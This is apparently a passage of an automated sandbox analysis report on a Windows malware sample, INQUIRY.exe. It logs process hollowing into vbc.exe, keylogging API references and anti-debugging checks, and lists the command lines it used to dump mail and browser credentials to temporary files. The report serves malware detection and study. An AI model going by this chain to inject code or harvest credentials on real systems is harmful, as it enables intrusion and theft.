                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,6_2_00408836
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004414DC SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,0_2_004414DC
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048F412 mov eax, dword ptr fs:[00000030h]1_2_0048F412
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048F4D0 mov eax, dword ptr fs:[00000030h]1_2_0048F4D0
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048B6F3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0048B6F3
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048A746 SetUnhandledExceptionFilter,1_2_0048A746
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048BBB5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0048BBB5
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048DD7F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0048DD7F
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory protected: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion:

                    .NET source code references suspicious native API functions
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.cs Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, RunPE.cs Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.cs Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, RunPE.cs Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.cs Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, RunPE.cs Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.cs Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, RunPE.cs Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.cs Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, RunPE.cs Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.cs Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, RunPE.cs Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.cs Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, RunPE.cs Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.cs Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, RunPE.cs Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.cs Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, RunPE.cs Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, RunPE.cs Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, RunPE.cs Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.cs Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, RunPE.cs Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Allocates memory in foreign processes
                    Source: C:\Users\user\Desktop\INQUIRY.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\INQUIRY.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Maps a DLL or memory area into another process
                    Source: C:\Users\user\Desktop\INQUIRY.exe Section loaded: unknown target: C:\Users\user\Desktop\INQUIRY.exe protection: execute and read and write
                    Sample uses process hollowing technique
                    Source: C:\Users\user\Desktop\INQUIRY.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\INQUIRY.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\Desktop\INQUIRY.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
                    Source: C:\Users\user\Desktop\INQUIRY.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
                    Source: C:\Users\user\Desktop\INQUIRY.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
                    Source: C:\Users\user\Desktop\INQUIRY.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\Desktop\INQUIRY.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
                    Source: C:\Users\user\Desktop\INQUIRY.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
                    Source: C:\Users\user\Desktop\INQUIRY.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe'
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2308
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2272
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2100
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2284
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,0_2_00405CA0
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: GetLocaleInfoA,GetACP,0_2_0040AD50
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: GetLocaleInfoA,0_2_004099D4
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: GetLocaleInfoA,0_2_00409A20
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,0_2_00405DAC
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: GetLocaleInfoA,1_2_0048EA4A
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,2_2_00405CA0
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: GetLocaleInfoA,GetACP,2_2_0040AD50
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: GetLocaleInfoA,2_2_004099D4
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: GetLocaleInfoA,2_2_00409A20
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,2_2_00405DAC
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
